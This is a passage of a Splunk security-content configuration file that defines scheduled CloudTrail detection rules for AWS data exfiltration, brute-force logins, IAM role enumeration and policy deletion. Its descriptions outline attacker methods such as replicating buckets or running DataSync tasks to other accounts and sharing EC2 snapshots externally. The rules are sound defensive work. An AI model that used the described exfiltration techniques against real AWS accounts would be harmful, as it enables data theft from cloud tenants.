description = This search uses the built-in Splunk command `| anomalydetection` to detect anomalies with respect to users making a high number of GetObject API calls to download objects from S3 in a 10 minute time window. The field `probable_cause` is the name of the field that best explains why the event is anomalous. This command identifies anomalous events by computing a probability for each GetObject event by "count" "user_type" "user_arn" and detects anomalies based on the frequencies.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1119"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = This search uses the built-in Splunk command `| anomalydetection` to detect anomalies with respect to users making a high number of GetObject API calls to download objects from S3 in a 10 minute time window. The field `probable_cause` is the name of the field that best explains why the event is anomalous. This command identifies anomalous events by computing a probability for each GetObject event by "count" "user_type" "user_arn" and detects anomalies based on the frequencies.
action.escu.how_to_implement = You must install the Splunk AWS add-on and Splunk App for AWS. This search works with AWS CloudTrail logs.
action.escu.known_false_positives = It is possible that a user downloaded these files to use them locally and that there are AWS services configured that perform these activities for a legitimate reason. A filter is needed.
action.escu.creation_date = 2023-04-10
action.escu.modification_date = 2023-04-10
action.escu.confidence = high
action.escu.full_search_name = ESCU - AWS Exfiltration via Anomalous GetObject API Activity - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"]
action.escu.analytic_story = ["Data Exfiltration"]
action.risk = 1
action.risk.param._risk_message = Anomalous S3 activities detected by user $user_arn$ from $src_ip$
action.risk.param._risk = [{"risk_object_field": "user_arn", "risk_object_type": "other", "risk_score": 64}, {"threat_object_field": "src_ip", "threat_object_type": "ip_address"}, {"risk_object_field": "aws_account_id", "risk_object_type": "other", "risk_score": 64}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - AWS Exfiltration via Anomalous GetObject API Activity - Rule
action.correlationsearch.annotations = {"analytic_story": ["Data Exfiltration"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1119"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `cloudtrail` eventName=GetObject | bin _time span=10m | stats count values(requestParameters.bucketName) as bucketName by _time src_ip aws_account_id user_type user_arn userIdentity.principalId | anomalydetection "count" "user_type" "user_arn" action=annotate | search probable_cause=* | `aws_exfiltration_via_anomalous_getobject_api_activity_filter`

[ESCU - AWS Exfiltration via Batch Service - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search looks for events where the AWS Batch Service is used to create a job that could potentially abuse the AWS Bucket Replication feature on S3 buckets. This AWS service can be used to transfer data between different AWS S3 buckets, and an attacker can leverage this to exfiltrate data by creating a malicious batch job.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1119"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = This search looks for events where the AWS Batch Service is used to create a job that could potentially abuse the AWS Bucket Replication feature on S3 buckets. This AWS service can be used to transfer data between different AWS S3 buckets, and an attacker can leverage this to exfiltrate data by creating a malicious batch job.
action.escu.how_to_implement = You must install the Splunk AWS add-on and Splunk App for AWS. This search works with AWS CloudTrail logs.
action.escu.known_false_positives = It is possible that an AWS administrator or a user has legitimately created this job for some tasks.
action.escu.creation_date = 2023-04-24
action.escu.modification_date = 2023-04-24
action.escu.confidence = high
action.escu.full_search_name = ESCU - AWS Exfiltration via Batch Service - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"]
action.escu.analytic_story = ["Data Exfiltration"]
action.risk = 1
action.risk.param._risk_message = AWS Batch Job is created on account id $aws_account_id$ from src_ip $src_ip$
action.risk.param._risk = [{"threat_object_field": "src_ip", "threat_object_type": "ip_address"}, {"risk_object_field": "aws_account_id", "risk_object_type": "other", "risk_score": 64}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - AWS Exfiltration via Batch Service - Rule
action.correlationsearch.annotations = {"analytic_story": ["Data Exfiltration"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1119"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This search looks for events where the AWS Batch Service is used to create a job that could potentially abuse the AWS Bucket Replication feature on S3 buckets. This AWS service can be used to transfer data between different AWS S3 buckets, and an attacker can leverage this to exfiltrate data by creating a malicious batch job.
action.notable.param.rule_title = AWS Exfiltration via Batch Service
action.notable.param.security_domain = threat
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `cloudtrail` eventName = JobCreated | stats count min(_time) as firstTime max(_time) as lastTime values(serviceEventDetails.jobArn) as job_arn values(serviceEventDetails.status) as status by src_ip aws_account_id eventName errorCode userAgent | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `aws_exfiltration_via_batch_service_filter`

[ESCU - AWS Exfiltration via Bucket Replication - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic detects API calls made to an S3 bucket when bucket replication services are enabled. S3 bucket replication is a feature offered by Amazon Web Services (AWS) that allows you to automatically and asynchronously copy data from one S3 bucket to another in the same or a different region.\
S3 bucket replication can also be used for cross-account replication, where data is replicated from a source bucket owned by one AWS account to a destination bucket owned by a different AWS account.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1537"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic detects API calls made to an S3 bucket when bucket replication services are enabled. S3 bucket replication is a feature offered by Amazon Web Services (AWS) that allows you to automatically and asynchronously copy data from one S3 bucket to another in the same or a different region.\
S3 bucket replication can also be used for cross-account replication, where data is replicated from a source bucket owned by one AWS account to a destination bucket owned by a different AWS account.
action.escu.how_to_implement = You must install the Splunk Add-on for AWS and the Splunk App for AWS. This search works with AWS CloudTrail logs.
action.escu.known_false_positives = It is possible that an AWS admin has legitimately implemented data replication to ensure data availability and improve data protection/backup strategies.
action.escu.creation_date = 2023-04-28
action.escu.modification_date = 2023-04-28
action.escu.confidence = high
action.escu.full_search_name = ESCU - AWS Exfiltration via Bucket Replication - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"]
action.escu.analytic_story = ["Suspicious AWS S3 Activities", "Data Exfiltration"]
action.risk = 1
action.risk.param._risk_message = AWS Bucket Replication rule $rule_id$ added on $source_bucket$ to $destination_bucket$ by user $user_arn$ from IP address $src_ip$
action.risk.param._risk = [{"risk_object_field": "user_arn", "risk_object_type": "other", "risk_score": 64}, {"threat_object_field": "src_ip", "threat_object_type": "ip_address"}, {"risk_object_field": "aws_account_id", "risk_object_type": "other", "risk_score": 64}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - AWS Exfiltration via Bucket Replication - Rule
action.correlationsearch.annotations = {"analytic_story": ["Suspicious AWS S3 Activities", "Data Exfiltration"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1537"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic detects API calls made to an S3 bucket when bucket replication services are enabled. S3 bucket replication is a feature offered by Amazon Web Services (AWS) that allows you to automatically and asynchronously copy data from one S3 bucket to another in the same or a different region.\
S3 bucket replication can also be used for cross-account replication, where data is replicated from a source bucket owned by one AWS account to a destination bucket owned by a different AWS account.
action.notable.param.rule_title = AWS Exfiltration via Bucket Replication
action.notable.param.security_domain = threat
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `cloudtrail` eventName = PutBucketReplication eventSource = s3.amazonaws.com | rename requestParameters.* as * | stats count values(bucketName) as source_bucket values(ReplicationConfiguration.Rule.ID) as rule_id values(ReplicationConfiguration.Rule.Destination.Bucket) as destination_bucket by _time user_arn userName user_type src_ip aws_account_id userIdentity.principalId user_agent | `aws_exfiltration_via_bucket_replication_filter`

[ESCU - AWS Exfiltration via DataSync Task - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search looks for potential misuse of an AWS service known as DataSync. This AWS service is used to transfer data between different AWS cloud storage services, such as Amazon S3, Amazon EFS, and Amazon FSx for Windows File Server. Attackers can create a task in AWS to periodically copy data from a private AWS location to a public location, resulting in the compromise of the data.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1119"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = This search looks for potential misuse of an AWS service known as DataSync. This AWS service is used to transfer data between different AWS cloud storage services, such as Amazon S3, Amazon EFS, and Amazon FSx for Windows File Server. Attackers can create a task in AWS to periodically copy data from a private AWS location to a public location, resulting in the compromise of the data.
action.escu.how_to_implement = You must install the Splunk Add-on for AWS and the Splunk App for AWS. This search works with AWS CloudTrail logs.
action.escu.known_false_positives = It is possible that an AWS Administrator has legitimately created this task for creating backups. Please check the `sourceLocationArn` and `destinationLocationArn` of this task.
action.escu.creation_date = 2023-04-10
action.escu.modification_date = 2023-04-10
action.escu.confidence = high
action.escu.full_search_name = ESCU - AWS Exfiltration via DataSync Task - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"]
action.escu.analytic_story = ["Suspicious AWS S3 Activities", "Data Exfiltration"]
action.risk = 1
action.risk.param._risk_message = DataSync task created on account id $aws_account_id$ by user $user_arn$ from src_ip $src_ip$
action.risk.param._risk = [{"risk_object_field": "user_arn", "risk_object_type": "other", "risk_score": 64}, {"threat_object_field": "src_ip", "threat_object_type": "ip_address"}, {"risk_object_field": "aws_account_id", "risk_object_type": "other", "risk_score": 64}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - AWS Exfiltration via DataSync Task - Rule
action.correlationsearch.annotations = {"analytic_story": ["Suspicious AWS S3 Activities", "Data Exfiltration"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1119"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This search looks for potential misuse of an AWS service known as DataSync. This AWS service is used to transfer data between different AWS cloud storage services, such as Amazon S3, Amazon EFS, and Amazon FSx for Windows File Server. Attackers can create a task in AWS to periodically copy data from a private AWS location to a public location, resulting in the compromise of the data.
action.notable.param.rule_title = AWS Exfiltration via DataSync Task
action.notable.param.security_domain = threat
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `cloudtrail` eventName = CreateTask eventSource="datasync.amazonaws.com" | rename requestParameters.* as * | stats count min(_time) as firstTime max(_time) as lastTime by src_ip aws_account_id awsRegion eventName destinationLocationArn sourceLocationArn userAgent user_arn userIdentity.principalId errorCode | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `aws_exfiltration_via_datasync_task_filter`

[ESCU - AWS Exfiltration via EC2 Snapshot - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search detects a series of AWS API calls related to EC2 snapshots, made in a short time window, that can indicate potential exfiltration via EC2 snapshot modifications. In this attack, the attacker typically proceeds by listing and creating EC2 snapshots of the available EC2 instances, followed by modifying snapshot attributes so that the snapshot can be shared externally. Once this is done, the attacker can load that EC2 snapshot and access all the sensitive information.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1537"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = This search detects a series of AWS API calls related to EC2 snapshots, made in a short time window, that can indicate potential exfiltration via EC2 snapshot modifications. In this attack, the attacker typically proceeds by listing and creating EC2 snapshots of the available EC2 instances, followed by modifying snapshot attributes so that the snapshot can be shared externally. Once this is done, the attacker can load that EC2 snapshot and access all the sensitive information.
action.escu.how_to_implement = You must install the Splunk Add-on for AWS and the Splunk App for AWS. This search works with AWS CloudTrail logs. We have intentionally excluded `guardduty.amazonaws.com` from src_ip to remove false positives caused by GuardDuty. We recommend that you adjust the time window for your environment.
action.escu.known_false_positives = It is possible that an AWS admin has legitimately shared a snapshot with another account for a specific purpose. Please check any recent change requests filed in your organization.
action.escu.creation_date = 2023-03-22
action.escu.modification_date = 2023-03-22
action.escu.confidence = high
action.escu.full_search_name = ESCU - AWS Exfiltration via EC2 Snapshot - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"]
action.escu.analytic_story = ["Suspicious Cloud Instance Activities", "Data Exfiltration"]
action.risk = 1
action.risk.param._risk_message = Potential AWS EC2 exfiltration detected on account id $aws_account_id$ by user $userName$ from src_ip $src_ip$
action.risk.param._risk = [{"risk_object_field": "userName", "risk_object_type": "other", "risk_score": 64}, {"threat_object_field": "src_ip", "threat_object_type": "ip_address"}, {"risk_object_field": "aws_account_id", "risk_object_type": "other", "risk_score": 64}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - AWS Exfiltration via EC2 Snapshot - Rule
action.correlationsearch.annotations = {"analytic_story": ["Suspicious Cloud Instance Activities", "Data Exfiltration"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1537"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This search detects a series of AWS API calls related to EC2 snapshots, made in a short time window, that can indicate potential exfiltration via EC2 snapshot modifications. In this attack, the attacker typically proceeds by listing and creating EC2 snapshots of the available EC2 instances, followed by modifying snapshot attributes so that the snapshot can be shared externally. Once this is done, the attacker can load that EC2 snapshot and access all the sensitive information.
action.notable.param.rule_title = AWS Exfiltration via EC2 Snapshot
action.notable.param.security_domain = threat
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `cloudtrail` eventName IN ("CreateSnapshot", "DescribeSnapshotAttribute", "ModifySnapshotAttribute", "DeleteSnapshot") src_ip!="guardduty.amazonaws.com" | bin _time span=5m | stats count dc(eventName) as distinct_api_calls values(eventName) values(requestParameters.attributeType) as attributeType values(requestParameters.createVolumePermission.add.items{}.userId) as aws_account_id_added values(userAgent) as userAgent by _time userName src_ip aws_account_id | where distinct_api_calls >= 2 | `aws_exfiltration_via_ec2_snapshot_filter`

[ESCU - AWS High Number Of Failed Authentications For User - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies an AWS account with more than 20 failed authentication events in the span of 5 minutes. This behavior could represent a brute force attack against the account. As environments differ across organizations, security teams should customize the threshold of this detection.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1201"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic identifies an AWS account with more than 20 failed authentication events in the span of 5 minutes. This behavior could represent a brute force attack against the account. As environments differ across organizations, security teams should customize the threshold of this detection.
action.escu.how_to_implement = You must install the Splunk Add-on for AWS and the Splunk App for AWS. This search works with AWS CloudTrail logs.
action.escu.known_false_positives = A user with more than 20 failed authentication attempts in the span of 5 minutes may also be triggered by a broken application.
action.escu.creation_date = 2023-01-27
action.escu.modification_date = 2023-01-27
action.escu.confidence = high
action.escu.full_search_name = ESCU - AWS High Number Of Failed Authentications For User - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"]
action.escu.analytic_story = ["Compromised User Account", "AWS Identity and Access Management Account Takeover"]
action.risk = 1
action.risk.param._risk_message = User $user_name$ failed to authenticate more than 20 times in the span of 5 minutes for AWS Account $aws_account_id$
action.risk.param._risk = [{"risk_object_field": "user_name", "risk_object_type": "other", "risk_score": 35}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - AWS High Number Of Failed Authentications For User - Rule
action.correlationsearch.annotations = {"analytic_story": ["Compromised User Account", "AWS Identity and Access Management Account Takeover"], "cis20": ["CIS 10"], "confidence": 70, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1201"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `cloudtrail` eventName=ConsoleLogin action=failure | bucket span=10m _time | stats dc(_raw) AS failed_attempts values(src_ip) as src_ip values(user_agent) by _time, user_name, eventName, eventSource, aws_account_id | where failed_attempts > 20 | `aws_high_number_of_failed_authentications_for_user_filter`

[ESCU - AWS High Number Of Failed Authentications From Ip - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies an IP address failing to authenticate 20 or more times to the AWS Web Console in the span of 5 minutes. This behavior could represent a brute force attack against an AWS tenant to obtain initial access or elevate privileges. As environments differ across organizations, security teams should customize the threshold of this detection.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1110", "T1110.003", "T1110.004"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic identifies an IP address failing to authenticate 20 or more times to the AWS Web Console in the span of 5 minutes. This behavior could represent a brute force attack against an AWS tenant to obtain initial access or elevate privileges. As environments differ across organizations, security teams should customize the threshold of this detection.
action.escu.how_to_implement = You must install the Splunk Add-on for AWS in order to ingest CloudTrail. We recommend that users try different combinations of the bucket span time and the tried-account threshold to tune this search for their environment.
action.escu.known_false_positives = An IP address with more than 20 failed authentication attempts in the span of 5 minutes may also be triggered by a broken application.
action.escu.creation_date = 2023-01-30
action.escu.modification_date = 2023-01-30
action.escu.confidence = high
action.escu.full_search_name = ESCU - AWS High Number Of Failed Authentications From Ip - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"]
action.escu.analytic_story = ["AWS Identity and Access Management Account Takeover", "Compromised User Account"]
action.risk = 1
action.risk.param._risk_message = Multiple failed console login attempts against users $tried_accounts$ seen from $src_ip$
action.risk.param._risk = [{"threat_object_field": "src_ip", "threat_object_type": "ip_address"}, {"risk_object_field": "tried_accounts", "risk_object_type": "user", "risk_score": 54}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - AWS High Number Of Failed Authentications From Ip - Rule
action.correlationsearch.annotations = {"analytic_story": ["AWS Identity and Access Management Account Takeover", "Compromised User Account"], "cis20": ["CIS 10"], "confidence": 90, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1110", "T1110.003", "T1110.004"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `cloudtrail` eventName=ConsoleLogin action=failure | bucket span=5m _time | stats dc(_raw) AS failed_attempts values(user_name) as tried_accounts values(user_agent) by _time, src_ip, eventName, eventSource, aws_account_id | where failed_attempts > 20 | `aws_high_number_of_failed_authentications_from_ip_filter`

[ESCU - AWS IAM AccessDenied Discovery Events - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following detection identifies excessive AccessDenied events within an hour timeframe. It is possible that an access key to AWS may have been stolen and is being misused to perform discovery events. In these instances, the stolen key does not have the access being attempted, so these events are generated.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1580"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = The following detection identifies excessive AccessDenied events within an hour timeframe. It is possible that an access key to AWS may have been stolen and is being misused to perform discovery events. In these instances, the stolen key does not have the access being attempted, so these events are generated.
action.escu.how_to_implement = The Splunk Add-on for AWS and the Splunk App for AWS are required to utilize this data. The search requires AWS CloudTrail logs.
action.escu.known_false_positives = It is possible that, at first, this detection will need to be tuned by source IP or user. In addition, raise the count threshold to restrict false positives.
action.escu.creation_date = 2021-11-12
action.escu.modification_date = 2021-11-12
action.escu.confidence = high
action.escu.full_search_name = ESCU - AWS IAM AccessDenied Discovery Events - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"]
action.escu.analytic_story = ["Suspicious Cloud User Activities"]
action.risk = 1
action.risk.param._risk_message = User $userIdentity.arn$ is seen to perform an excessive number of discovery-related API calls ($failures$) within an hour where the access was denied.
action.risk.param._risk = [{"threat_object_field": "src_ip", "threat_object_type": "ip_address"}, {"risk_object_field": "userIdentity.arn", "risk_object_type": "other", "risk_score": 10}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - AWS IAM AccessDenied Discovery Events - Rule
action.correlationsearch.annotations = {"analytic_story": ["Suspicious Cloud User Activities"], "cis20": ["CIS 10"], "confidence": 50, "impact": 20, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1580"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `cloudtrail` (errorCode = "AccessDenied") user_type=IAMUser (userAgent!=*.amazonaws.com) | bucket _time span=1h | stats count as failures min(_time) as firstTime max(_time) as lastTime, dc(eventName) as methods, dc(eventSource) as sources by src_ip, userIdentity.arn, _time | where failures >= 5 and methods >= 1 and sources >= 1 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `aws_iam_accessdenied_discovery_events_filter`

[ESCU - AWS IAM Assume Role Policy Brute Force - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following detection identifies any malformed policy document exceptions with a status of `failure`. A malformed policy document exception occurs in instances where roles are attempted to be assumed, or brute forced. In a brute force attempt, using a tool like CloudSploit or Pacu, an attempt will look like `arn:aws:iam::111111111111:role/aws-service-role/rds.amazonaws.com/AWSServiceRoleForRDS`. This means that when an adversary is attempting to identify a role name, multiple failures will occur. This detection focuses on the errors of a remote attempt that is failing.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1580", "T1110"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = The following detection identifies any malformed policy document exceptions with a status of `failure`. A malformed policy document exception occurs in instances where roles are attempted to be assumed, or brute forced. In a brute force attempt, using a tool like CloudSploit or Pacu, an attempt will look like `arn:aws:iam::111111111111:role/aws-service-role/rds.amazonaws.com/AWSServiceRoleForRDS`. This means that when an adversary is attempting to identify a role name, multiple failures will occur. This detection focuses on the errors of a remote attempt that is failing.
action.escu.how_to_implement = The Splunk Add-on for AWS and the Splunk App for AWS are required to utilize this data. The search requires AWS CloudTrail logs. Set the `where count` threshold to a value that identifies suspicious activity in your environment.
action.escu.known_false_positives = This detection will require tuning to provide high fidelity detection capabilities. Tune based on src addresses (corporate offices, VPN terminations) or by groups of users.
action.escu.creation_date = 2021-04-01
action.escu.modification_date = 2021-04-01
action.escu.confidence = high
action.escu.full_search_name = ESCU - AWS IAM Assume Role Policy Brute Force - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"]
action.escu.analytic_story = ["AWS IAM Privilege Escalation"]
action.risk = 1
action.risk.param._risk_message = User $user_arn$ has caused multiple failures with errorCode $errorCode$, which potentially means an adversary is attempting to identify a role name.
action.risk.param._risk = [{"threat_object_field": "src", "threat_object_type": "ip_address"}, {"risk_object_field": "user_arn", "risk_object_type": "user", "risk_score": 28}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - AWS IAM Assume Role Policy Brute Force - Rule
action.correlationsearch.annotations = {"analytic_story": ["AWS IAM Privilege Escalation"], "cis20": ["CIS 10"], "confidence": 70, "impact": 40, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1580", "T1110"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following detection identifies any malformed policy document exceptions with a status of `failure`. A malformed policy document exception occurs in instances where roles are attempted to be assumed, or brute forced. In a brute force attempt, using a tool like CloudSploit or Pacu, an attempt will look like `arn:aws:iam::111111111111:role/aws-service-role/rds.amazonaws.com/AWSServiceRoleForRDS`. This means that when an adversary is attempting to identify a role name, multiple failures will occur. This detection focuses on the errors of a remote attempt that is failing.
action.notable.param.rule_title = AWS IAM Assume Role Policy Brute Force
action.notable.param.security_domain = access
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `cloudtrail` (errorCode=MalformedPolicyDocumentException) status=failure (userAgent!=*.amazonaws.com) | stats count min(_time) as firstTime max(_time) as lastTime values(requestParameters.policyName) as policy_name by src eventName eventSource aws_account_id errorCode requestParameters.policyDocument userAgent eventID awsRegion userIdentity.principalId user_arn | where count >= 2 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `aws_iam_assume_role_policy_brute_force_filter`

[ESCU - AWS IAM Delete Policy - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following detection identifies when a policy is deleted on AWS. This does not distinguish successful from failed attempts, but the error messages tell a story of suspicious attempts. There is a specific process to follow when deleting a policy. First, detach the policy from all users, groups, and roles that the policy is attached to, using DetachUserPolicy, DetachGroupPolicy, or DetachRolePolicy.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = The following detection identifies when a policy is deleted on AWS. This does not distinguish successful from failed attempts, but the error messages tell a story of suspicious attempts. There is a specific process to follow when deleting a policy. First, detach the policy from all users, groups, and roles that the policy is attached to, using DetachUserPolicy, DetachGroupPolicy, or DetachRolePolicy.
action.escu.how_to_implement = The Splunk Add-on for AWS and the Splunk App for AWS are required to utilize this data. The search requires AWS CloudTrail logs.
action.escu.known_false_positives = This detection will require tuning to provide high fidelity detection capabilities. Tune based on src addresses (corporate offices, VPN terminations) or by groups of users. Not every user with AWS access should have permission to delete policies (least privilege). In addition, this search may be saved separately and tuned for failed or successful attempts only.
action.escu.creation_date = 2021-04-01
action.escu.modification_date = 2021-04-01
action.escu.confidence = high
action.escu.full_search_name = ESCU - AWS IAM Delete Policy - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"]
action.escu.analytic_story = ["AWS IAM Privilege Escalation"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - AWS IAM Delete Policy - Rule
action.correlationsearch.annotations = {"analytic_story": ["AWS IAM Privilege Escalation"], "cis20": ["CIS 10"], "confidence": 50, "impact": 20, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
